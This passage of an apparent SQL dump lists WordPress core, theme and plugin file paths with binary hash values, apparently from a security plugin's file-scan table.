�N-@G\'��tmG��i��kR߮g\0','',0,'?'),('u�@@�� �����N6','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php',0,'�E��ƀk�vk��\r','�E��ƀk�vk��\r','���iiLM�P���4�ިO_!���iN	�','',0,'?'),('uՙ�������1?�ޙ�','wp-content/plugins/wp-cerber/assets/flags/tf.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"*BzQp�H>n�','��|b�Bz.3I�l1�������P��3�','',0,'?'),('u��k6��O�>�&�W','wp-includes/blocks/text-columns/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c^�*��w��G㐾Q�','�+\\���1{*C�G+����J���Lv','',0,'?'),('u�(���IMR�Br','wp-content/plugins/wp-smushit/app/views/webp/disabled-meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;���C<�s��&`','��\n��q�����ߐ[�ϽO,H��:���n','',0,'?'),('u�G�F\\:���)���','wp-includes/blocks/post-comments-form/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���fY�Է8hx�;Q','c��IrD3a�`\"V]�#��׬��� ��.a','',0,'?'),('u�qg\Z\0�8�hԭ�\0�','wp-admin/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y����&�','�Θ�4��C�w@�Xdo��N=w���<~o�','',0,'?'),('u�ҫ���;^�\'B�*','wp-includes/global-styles-and-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��Y	1�*���Q�r�','���k<�eB%��^�\Z�p?�p���]\'���+','',0,'?'),('u�:�z�2�DQ��4','wp-includes/blocks/tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','! 	�X旿W���J','wH�p��\"r6`\"��D=m�z�hD�����c#','',0,'?'),('u���cz��J��D���M','wp-includes/blocks/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �9�lƊD�HB��$','�H%�C�[.��u���kF�zh��C�A��\"','',0,'?'),('u���\'M���2�','wp-includes/blocks/embed/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� :�P.X`��L���','+�/�Q�@C�h�)�P�Ԡ�,S05��v�zp','',0,'?'),('vڴ����V���K��P','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���PNڡ\'f���','\r]�~[�������_˳�P�B�TA`��*,O','',0,'?'),('v�)F��~q���?b','wp-admin/includes/class-plugin-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')@\'�e�@�Ձ\0�F��','6�\\oM������y�>��^�iE\\|��ӹ�','',0,'?'),('v&5�jr�jL #�ܲ�','wp-includes/blocks/categories/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]UpʛV���L�\n','�`op���V�/2�ˍ�(NW\Z�N�\'K�5','',0,'?'),('v).��x�3�.#Ul��','wp-content/plugins/wordpress-seo/js/dist/post-edit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H1k�m�|��R��*','~?�E���O43	O�_(^B㐞�\n�j�2I�Ȭ','',0,'?'),('v3S�+7\rĠ9C��{','wp-includes/blocks/navigation/view-modal.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�D\nm���\r]�]�7','@�O���x�;��\Z������\0�\nC�=zp=','',0,'?'),('v5�8����,��U;�','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/ClientCredentials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@d����ic�U���+','e]6H�GJ���dk��I�`�ߟ�$��}Nbj','',0,'?'),('v>\n��A?�U���(�','wp-includes/blocks/post-terms/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t�k�Cw�y�?A�a','J5�D�j�$�У��m�[��U�8�X�a\Z�','',0,'?'),('vB��2ލ%\0��ꇚ\"','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|��N��\'/2d��l','�Z��\Z7�äS�\"�e�w�m��#��k��6','',0,'?'),('vK;@�s�aU1;�	^�','wp-config.php',0,',�0u�t�t|s�_R�',',�0u�t�t|s�_R�','%���y�,�qk�c�Y	GX�����&x�<','',0,'?'),('vLM�.f���%OMR','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�V+=?k�\r���','_����x:�nOsO�:d�\'\0�N=���k�','',0,'?'),('vM�m*&Z�`\'/b�+','wp-includes/js/jquery/ui/effect-puff.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�������Ġf�$','��%d���U�(�W�.�:k�YtL�<��','',0,'?'),('vP�\ru7BZ)��ϋ','wp-content/plugins/wp-cerber/assets/flags/us.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q#}��X��s�\'\0�','�S�,��R]���&�;ݟ�J{��&���','',0,'?'),('vW	���Y�:\ZPK�','wp-content/plugins/wp-smushit/core/external/free-dashboard/assets/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3_��׎�6b�{���','��ȇ�\r�S�$��M�z��KU���ʿ�&���','',0,'?'),('vW2[����q�ʶ���q','wp-content/plugins/wp-cerber/assets/flags/tl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/��c�-\n�&\'}�!oz',')���T3V��U\r��$�xҽ�K\rVe֬�','',0,'?'),('v_޸��k�c�3�a','wp-content/plugins/redirection/matches/ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ծ|�.��&�##�','!7�mħ�}�?%A*�;7�\0������k���','',0,'?'),('ve׶\\�l.�х{','wp-includes/js/dist/vendor/wp-polyfill-formdata.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S|���hDO�3\n�\n2�','4��N^p��Z$B��o�T#Z��v�R\r8vw','',0,'?'),('vi�fuP�0^�>d��','wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��SG��˺��F���','[�(��R�������$��2o���t�b��','',0,'?'),('vw��@�H��z�F�','wp-admin/ms-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UjA�ڦYq�u��	','���\"G\n��ڔ���Mh�Q�2��l�\'�ܵ�','',0,'?'),('v~��c��hTxI�����','wp-includes/wp-includes/js/tinymce/langs/wp-langs-en.js',0,'���s�/�q��','���s�/�q��','����T����s���%���S�Z������','',0,'?'),('v]�z������3�tB','wp-admin/includes/class-wp-importer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��De�ֶs��','d��R`5�DF$I�<�_�,_X�L�}ke��','',0,'?'),('v��ޣ�R�','wp-includes/js/jquery/jquery-migrate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�6��?ٳ��t�\r','t��&�hp�z���wĝ�&��Ś9&�7����v','',0,'?'),('vâ,\\�+Q�����֧','wp-admin/css/l10n-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OS�GfK罚�8��]','�d�x���k3r��ްVNĪ�e��t��-�����','',0,'?'),('v���DQ�~�1��X[3','wp-includes/wp-includes/js/dist/list-reusable-blocks.min.js',0,'t��|�eɤs^�Q�','t��|�eɤs^�Q�','���f��i7� �L�:��r;�8\"�h<s�P�','',0,'?'),('v�.�#P�����H2��','wp-includes/blocks/buttons/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','큺j�ܳ�Ab��xS�',' Y�\\�O�>糈����*ޒ9�}JӉ��T�<\Z','',0,'?'),('v��q?\0�{��=�ŭe','wp-includes/blocks/site-logo/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','COao��\"\n%6g$�l�','�\0�X�-\"#KX>S�g�3!n��T���ۑ�λ','',0,'?'),('v�G�.�g�A��#�r�','wp-admin/images/align-right-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�l�>r�]�lW��x','�V:�h���#ȆBT�5i\0�?��c�Bc���','',0,'?'),('v�3NşD��fci��','wp-content/plugins/all-in-one-wp-security-and-firewall/images/notices/aiowps-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��n�$�����\r�','����Ö��2���u��@ԁ �Ő��.�','',0,'?'),('v�@<w�m&���6�','wp-includes/wp-includes/css/dashicons.min.css',0,'֍k����U�о�3�','֍k����U�о�3�','|�38�9&ΚG�\"#��\0̠��;���e�R�','',0,'?'),('v���4�|>�<����','wp-admin/js/xfn.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wcW��_~\r�1��>p','4�[����Ÿ$[�\\��Ə�4�-3���z��x�','',0,'?'),('v�����rԋ��a�','wp-includes/wp-includes/js/tinymce/tiny_mce_popup.js',0,'B7�I1�0�����d�','B7�I1�0�����d�','���\'З��/!\Z�a!�~�)��1D��','',0,'?'),('v�{#��l��b\0}��B','wp-admin/css/colors/light/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b&��}h?��7����','_����\Zz����i�����4��s+�7','',0,'?'),('v�Ҹ);�D��~J\"�q','wp-includes/js/jquery/jquery.form.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O����f������N',':�U��a�8��\ZP�����I��	���j�','',0,'?'),('wu�l|��p��Q','wp-includes/js/autosave.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������h����','�����x��J���+�?8۝J�����JZ�\n','',0,'?'),('w!� -!{0�\'�\\�Z','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',0,'t�r�I���bw\'-7�','t�r�I���bw\'-7�','�u�S�{��<���n\r߅+-#�;�᷃QЮ','',0,'?'),('w,�a\Z\r)�wb#�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/StreamHandler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Qdm���-TF���','�婱N�������@�L���r�g��5��rF','',0,'?'),('w5�n3$���LZ��2`7','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-home-page-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c컥@��6���T粇','�6968����/׻�D�d�g\r~�������TU','',0,'?'),('w8h*�\\;���e�[�','wp-includes/blocks/archives/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��Ǟs[��p��O\'�','*������z���tRM�R�^/���cΟ�','',0,'?'),('w>�	2ý��f�\'��','wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-auto.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�{#&V�P½�	*\r�','��Ȩ�:�u.n��8u��Z���/(��n�','',0,'?'),('wDI��-E��I�l�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��%�a;B3>|CX��','B;,�y��_�:�$������E5��B0��\0','',0,'?'),('wZ��kFD9�����h','wp-includes/blocks/site-tagline/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��yqT�<3c�	��','�2�����Vz�&�A]S��	��x�Z�%6Jb','',0,'?'),('we��j�Z�q�I�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�,�����Eڎ�;','5+�S�sY>%�r9�7�5[I�=�`<2M��','',0,'?'),('wi��#�]��F���S�','wp-content/plugins/wordpress-seo/src/integrations/third-party/the-events-calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x��@���B{tZ','8������,|숂~��.�Q���ew�%�2$d','',0,'?'),('wz�W�%*��5R;r','wp-includes/wp-includes/js/media-editor.min.js',0,'Sq��a:�_::ΗF�.','Sq��a:�_::ΗF�.','\0X�n�,�T�P� �QKh&���xFH���u;7','',0,'?'),('w~c�9G]N�aF��\0�','wp-content/plugins/redirection/locale/json/redirection-ja.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��&-z�|��C','�JIcV�%o�^S��Q�W������/�~�','',0,'?'),('w��g���r�{֚�^','wp-content/plugins/wordpress-seo/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('w�ž�!�J�La/+�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Pool.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n;7�M�d0L|���','�Ux�!���:&(�C���q�6��j�����','',0,'?'),('w��\'�\Z���/����','wp-content/plugins/wordpress-seo/src/helpers/sanitization-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8��+�d}��UP','fi��8�S��ҥ��zT����d�\"w�\'�q�4','',0,'?'),('w���L��0���]r.','wp-includes/images/crystal/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�1�����1�9',';�67����\r�!����x\Z_@H��&C��-��','',0,'?'),('w�@�I�e��R�f�7��','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����h�R���','���=�mH��/�\ne��C��3�u58�','',0,'?'),('w��`M��>�{���','wp-admin/includes/noop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�qj����\Z!�\r:�','dˎJ��������P[\n=��Qc����P�','',0,'?'),('w�^�d��g�Agbm','wp-includes/wp-includes/class-wp-post-type.php',0,'1$�%�:��I�:��','1$�%�:��I�:��','P댭���t\\V�ܛ&��T���\Zݝ�^6�','',0,'?'),('w��A��������	','wp-content/plugins/wp-fastest-cache/templates/disable_wp_cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�^n�ĜPAYj�=K%','��u�\"���	��.r2�e7^FdMix-�','',0,'?'),('w�S����@��U��','wp-content/plugins/redirection/locale/redirection-fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�-KYø߷��L��;','Y_k|0�ԥХ+�%2tLS2��H�[c�+�','',0,'?'),('wË���9/,+1��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�� �Z8�t\"','avxu��흶j��=�I�S��D{����!','',0,'?'),('w�&G�[{�.�_���f','wp-content/plugins/wp-fastest-cache/images/loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��E*��D�\ZQ�','JoY���oTJ��}ĉz�K�(�Wk7�6�.��','',0,'?'),('w�Ջ\\�G�&���A','wp-includes/blocks/template-part/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V8�͝�����R<��j','�4Lx�1�r6����(��t7�*��B���	','',0,'?'),('w��c�W�i���','wp-content/plugins/wp-fastest-cache/js/lang/pl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p?F7�ߝF���','�w�]k�sѶrPi�+/�F�{Kn���%)��R','',0,'?'),('w�+2v�)wq0�\'OG�','wp-content/plugins/wordpress-seo/src/routes/yoast-head-rest-field.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T���8�R�O�O�a','&M|�5L]��6���E�UL���1_�%','',0,'?'),('w��\\��A^��V�N$^','wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nq*��ZF�)2�','�&4\"\rQ�jX�mN\"��?P�o��\\��?���','',0,'?'),('w������:}V��P','wp-admin/js/common.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1Bnyj�=�%r�Fr','�k��7I��1m�y��U��9�Iu���mQYh�z','',0,'?'),('x	G!N�$�.�d�Tb�','wp-includes/ID3/module.audio-video.flv.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���AZ?�!x&3h�','�7T@�7�l��E�œ#�����V�,�Li��\'�','',0,'?'),('xF!��e������W�','wp-content/plugins/redirection/models/regex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_EѬf�+��]fkW ','��1٦-}„��ҪμFI���9���\\<G���','',0,'?'),('x9@^6��ߑ��o��','wp-includes/images/w-logo-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[N�W��_p�w�0','ޣ^Q�t�3�H�unU❻��~�\'�T2','',0,'?'),('xIH�.�9�Y��BO','wp-admin/css/colors/coffee/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�u���i��PA�\Z���','�67�S�D><ȶ����ye�ՋV�N�cMM','',0,'?'),('xLKx ��2��Is�!#Q','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�U������CB\"','��)M���쩂tU��δ�Ԫ���F.�','',0,'?'),('xP�ފTX�����?','wp-includes/wp-includes/theme-compat/header.php',0,'�s��<w�!��1','�s��<w�!��1','q�2�յ��Ϣ>r�7Nj��	D�^��A5\r','',0,'?'),('xSAa �/�q��|','wp-content/plugins/wp-cerber/assets/flags/ae.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=���]�6�s+�','���࠿L˖��_��� �K  �m�5�%','',0,'?'),('xV�Z���]�B�B�ya','wp-includes/wp-includes/sitemaps/class-wp-sitemaps-index.php',0,'�&a���1��5b}1','�&a���1��5b}1','�kZ���`��*5Yu�…�WB�-4Y?�{̯�','',0,'?'),('xV�M��>�n�{O�ǟ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I,0�`�-=�OxH��','Ⰱm�Wka���2��Sj�>����\"�w�<','',0,'?'),('x`�s�p�(�7$\'��','wp-content/plugins/wordpress-seo/admin/views/partial-notifications-warnings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ն���F��>','(\Z�9[�h�a����=��o�Y�^L{_A�.S','',0,'?'),('xa�KP9��j�	�','wp-includes/blocks/comment-date/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�g�x���L','�ӡr�ހW�\\C�3�ep�Sc��ğa{“me&','',0,'?'),('xy�!��q�)�.ˉ\"','wp-content/plugins/wordfence/images/sort_desc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m����͟��r�� 9',';	�_�Y���t�7K��s��mC��\r����o','',0,'?'),('x�qly��(��:�V�5','wp-includes/wp-includes/class-wp-xmlrpc-server.php',0,'1�.d��\rZ�D�6','1�.d��\rZ�D�6','���f���ɝq?��pRv�u�Ȣ�','',0,'?'),('x�7.D�&�ڹ�g�','wp-includes/blocks/navigation-submenu/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ZJDs��uu�y��!','ha�l\0���ҍ��TH�C�*��s���*!�','',0,'?'),('x�C���\"h&_�\0ۣ��','wp-includes/wp-includes/class-wp-http-requests-response.php',0,'�O�TP^��rbb!d�','�O�TP^��rbb!d�','�\Z���[Щǩ�{S.Ws:���e��\"#z�[N','',0,'?'),('x��גP���� �,;C','wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-lazy_load.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����p�킬s���-t','H��66�\Z�<օD�-3\'���d�kJϛ&~7','',0,'?'),('x��8�0����ع��','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/select2.full.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�]�7��;2���})','���G�.�?=�VX!�>����6�Qee\\��','',0,'?'),('x�^m�]̲�/��L4vU','wp-admin/includes/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���r�\'C*P�I}��I','���I�L���n\n����4��yaQ��)͙{�','',0,'?'),('x��\\��\0v�`�%�]�','wp-content/plugins/redirection/fileio/apache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*G8��0��/�}��','�ٰ#�2�ꔜ(�Gr�o*�h_VlU�XM','',0,'?'),('x���޶�5LC�}��','wp-content/plugins/wordpress-seo/admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EЛ��O0��c���Ag3','��	蚠{�c�FJ�w��!}a���9�','',0,'?'),('x������yu�H;�','wp-includes/wp-includes/js/dist/block-editor.min.js',0,'����l�(�� \r$','����l�(�� \r$','W��W�B�/hfq!�r|�{z`-+k�D�','',0,'?'),('x��2\Z4��Ɲ��{��','wp-content/themes/hitmag/inc/kirki/class-kirki-autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]b��~U��.���l','\n\n���f.��ױ;�Կ�ŏ���S4|�����','',0,'?'),('x�.���X��J$�ɮܹ','wp-includes/blocks/pullquote/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�U4Ɯi��q洕H��','�r�0\\�1ɛ\njL�����\\P�=����','',0,'?'),('x덂��@}Y��i�+','wp-includes/js/tinymce/plugins/tabfocus/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ώ�@�/@M�m�N�','�xM��\'Ȥ��=�ڷ�?$�S,Fy���֥','',0,'?'),('x�z#�]�r�u?0��O�','wp-includes/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h���g`ɸ:ڕ^','���F/Q�H\0���^l 0�BΓի6S@Ph�','',0,'?'),('y���1��-�/fIנ','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��09\r�ɘa�d���P','F*O�Оq^�l��gz���,I?�b�R�]K�ֳE','',0,'?'),('y&E�zݜ�Z�y׺ڲ','wp-includes/class-wp-recovery-mode-key-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O������j�:��','�A�Չ���]�p�r����!6��eK<','',0,'?'),('y52�m�\0�l�\"�e','wp-includes/js/dist/priority-queue.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t�����p�3M\0','����Z�!`-ǵ�}��D�HcK*���T�=�','',0,'?'),('yA��0���Xz(��\'\\','wp-admin/js/widgets/media-gallery-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W����l�3I�E�h��','�ZhX\0�����	,P�6[�=��2�޸��','',0,'?'),('yC��\\9G^�h�','wp-includes/wp-includes/post-template.php',0,'a^E�@�p�\'��?�','a^E�@�p�\'��?�','N�O�[wȐ��	��&Ќ�!P��Qe��s','',0,'?'),('yD��-�\0ڝ�?l/','wp-content/themes/hitmag/images/slide-thumb.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�\\b����K�ѧ�2�','+VV��o�X\\�\n<�x��/q�m	���������','',0,'?'),('yN|�%�t�s(#��','wp-content/themes/hitmag/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[˧9Ž�^2�*��dk�','*�\ZV��&.4��bH�ay�9�K�&g}�-d�','',0,'?'),('yO�\0yj�eB\nVp��','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��ƀk�vk��\r','���iiLM�P���4�ިO_!���iN	�','',0,'?'),('ye�*�B��[����','wp-includes/wp-includes/sodium_compat/namespaced/Core/Salsa20.php',0,'\rV�N�ck0�}/�Ճ�','\rV�N�ck0�}/�Ճ�','n�K��kZ��	���� N$ � EК���e�$','',0,'?'),('yuh��m\06��2�6�v\0','wp-content/plugins/wordpress-seo/src/helpers/image-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MQ�ڼ��f���[v','��	�^����b|�C%{;j-���(B�B�;C�','',0,'?'),('y��\n�,\nC�|[i','wp-includes/customize/class-wp-customize-selective-refresh.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A;\Z��+����z�O�','s�\'�kw�͵����@����J(J�zNLJ����','',0,'?'),('y�r;���9)3W�+�(j','wp-content/plugins/wordpress-seo/src/services/importing/aioseo/aioseo-robots-transformer-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w��\Z�6}~��o�','n���F)��H_Y�1n�:j�tu�ސoK+','',0,'?'),('y��9 1v.`F2��','wp-includes/wp-includes/js/swfobject.js',0,'���,�I}p�e~2�q�','���,�I}p�e~2�q�','?��Lw���.�4M��ՒF�J�>fI�鴆�','',0,'?'),('y��{�\\b�a\'�\\','wp-includes/customize/class-wp-sidebar-block-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]m��L-D���+Zٕ','�o,bL�nB��Qv�-|q�d���\'B=�X&','',0,'?'),('y�xM���@�O�','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-smartcrawl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t@��N����j��^E','�~���/��|kc��gj�#�㠻�0��t�c','',0,'?'),('y��������R?kZB�','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-titles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�;�핑��3�i}�{q','\Z�ɳ�7l��<դȍ~������	�&�','',0,'?'),('y���ٌ�&}�=�^�;','wp-content/themes/hitmag/inc/dashboard/css/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~VK�2��Y\\^obQ','q���f$�f\0�c{��rJ�Ѓ=��d��k','',0,'?'),('y��V�|/�N/����','wp-content/plugins/wordpress-seo/js/dist/externals-contexts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���P;��	fa���� �','oNM�(Z���9&gL\"�����_��;\r����','',0,'?'),('y���E�a��:�[\0','wp-includes/class.wp-dependencies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o=`,W���Q�-��8�','\"]_���1ts�\"d����-{����Ă��^�\\','',0,'?'),('y��j�@^�=B����','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`_���nU���\"�x�','�?�(m���\'�M�eT�CѬu�mx�\"Խ��\'�','',0,'?'),('y�3���2/��[X#��F','wp-includes/blocks/query-title/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�݄���\0�\Ze�\Z','�VR}����%�����T���V�5�.�rSyl�','',0,'?'),('y�h�Bi�y�/�@��','wp-content/plugins/wordfence/css/jquery-ui.structure.min.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�/��h<��U��','�n���i��뗅�N�vX�7�Y]�����D','',0,'?'),('y���G�\\`��MR�','wp-admin/network/site-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��X��k\'4ȸi��','K�9����imЬky0�4���V�q�	F?�','',0,'?'),('y���\0Lz�㶵�و','wp-includes/blocks/group/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I����W�@�GB!?','�YTl$f���u|�O�bم� �#놊�)���','',0,'?'),('y�\"�jY\0u���<c','wp-content/plugins/wp-cerber/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n ]U�,kU��\"\n�','$|�	�,F|��x���y���ww̟���%�1l','',0,'?'),('y�\\���.J.�=�ou','wp-includes/wp-includes/template.php',0,'^��f?Yk�EЉ��+V','^��f?Yk�EЉ��+V','a�+)	�h=���%d�D�\Z/��BA��j\\�n','',0,'?'),('y�.S�{����5�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/ar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4)��\0�-\"z����','���H�4�ZK�2VzN.�ᡨ���uE�5w:','',0,'?'),('z\rR2nLS�k��','wp-content/plugins/redirection/api/api-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J:	K�N�\n���','�2�4�Qg�����8g����p